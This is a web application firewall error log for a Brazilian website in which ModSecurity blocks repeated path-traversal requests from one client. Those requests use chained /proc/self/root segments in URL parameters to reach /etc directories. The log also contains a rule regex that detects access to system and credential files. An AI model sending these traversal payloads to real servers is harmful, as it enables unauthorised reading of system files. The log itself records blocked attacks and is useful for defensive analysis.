[Tue Mar 17 08:18:06.898952 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.241.46:47990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4btCmCSWTlPouqorDDgAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:18:09.334841 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.241.46:49478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4cdCmCSWTlPouqorDEwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:18:14.539492 2026] [:error] [pid 5398:tid 140411590858496] [client 74.7.228.16:52276] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk4dgRES9pL8P-grjlfxwAAAhI"]
[Tue Mar 17 08:18:36.739253 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.241.46:49484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4jAQohV2v-7oj5HHyTQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:18:56.678349 2026] [:error] [pid 1517:tid 140411624429312] [client 74.7.241.46:51746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4oGHuKRvkhJseepPamAAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:19:00.443205 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.241.46:51758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4pO82sZHvlq4xgHq68QAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:08.172445 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:45998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4rKBJNF7axNlVR0X0oAAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:19:15.135071 2026] [:error] [pid 662:tid 140411616036608] [client 74.7.241.46:59582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4s660egQjobaJUYgHZgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:19:20.967675 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.241.46:59596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4uKBJNF7axNlVR0X0pwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:19:41.603367 2026] [:error] [pid 6002:tid 140411641214720] [client 74.7.241.46:45086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4zfAKZeKGvQeoFhlC5gAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:43.258825 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:34058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4z6BJNF7axNlVR0X0sQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:44.789551 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.241.46:34070] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk40FKJy4A1bGlmj9BNgAAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:46.163625 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:34078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk40u82sZHvlq4xgHq7AQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:47.533487 2026] [:error] [pid 1961:tid 140411548894976] [client 74.7.241.46:34094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk403RXaaWotPICgYscAgAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:48.851586 2026] [:error] [pid 1517:tid 140411624429312] [client 74.7.241.46:59894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk41GHuKRvkhJseepParAAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:51.307098 2026] [:error] [pid 32588:tid 140411574073088] [client 74.7.241.46:59906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk41y8PwvOE6ZaeZxiGCQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:19:58.703578 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:59916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk43pDEJR9VXonE_-1FGwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:00.207402 2026] [:error] [pid 5398:tid 140411733534464] [client 74.7.241.46:41416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk44ARES9pL8P-grjlf6wAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:07.055693 2026] [:error] [pid 1210:tid 140411590858496] [client 74.7.241.46:41418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk451KJy4A1bGlmj9BNhgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:09.843615 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:44044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk46XRXaaWotPICgYscCwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:12.499458 2026] [:error] [pid 4712:tid 140411565680384] [client 74.7.241.46:44058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk47HQLOys_ArAUsGMJOAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:14.071310 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.241.46:44072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk47nRXaaWotPICgYscEAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
